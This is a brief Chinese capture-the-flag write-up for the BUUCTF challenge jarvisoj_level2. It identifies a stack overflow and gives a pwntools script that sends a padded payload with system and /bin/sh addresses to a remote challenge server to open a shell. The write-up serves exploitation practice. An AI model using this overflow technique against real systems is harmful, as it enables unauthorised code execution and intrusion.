BUUCTF-jarvisoj_level2(7/100)
一、查保护
二、代码审计
三、过程
栈溢出,提供了system和/bin/sh的地址。
脚本
from pwn import *
from LibcSearcher import *
#context(os='linux', arch='amd64', log_level='debug')
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
sla=lambda x,y:io.sendlineafter(x,y)
sl=lambda x:io.sendline(x)
#io = process('./babyrop')
io=remote('node3.buuoj.cn',25308)
sla('Input:','pyzyyds'*19+'a'*3+'b'*4+p32(0x8048320)+p32(0x8048480)+p32(0x804A024))
io.interactive()
浙公网安备 33010602011771号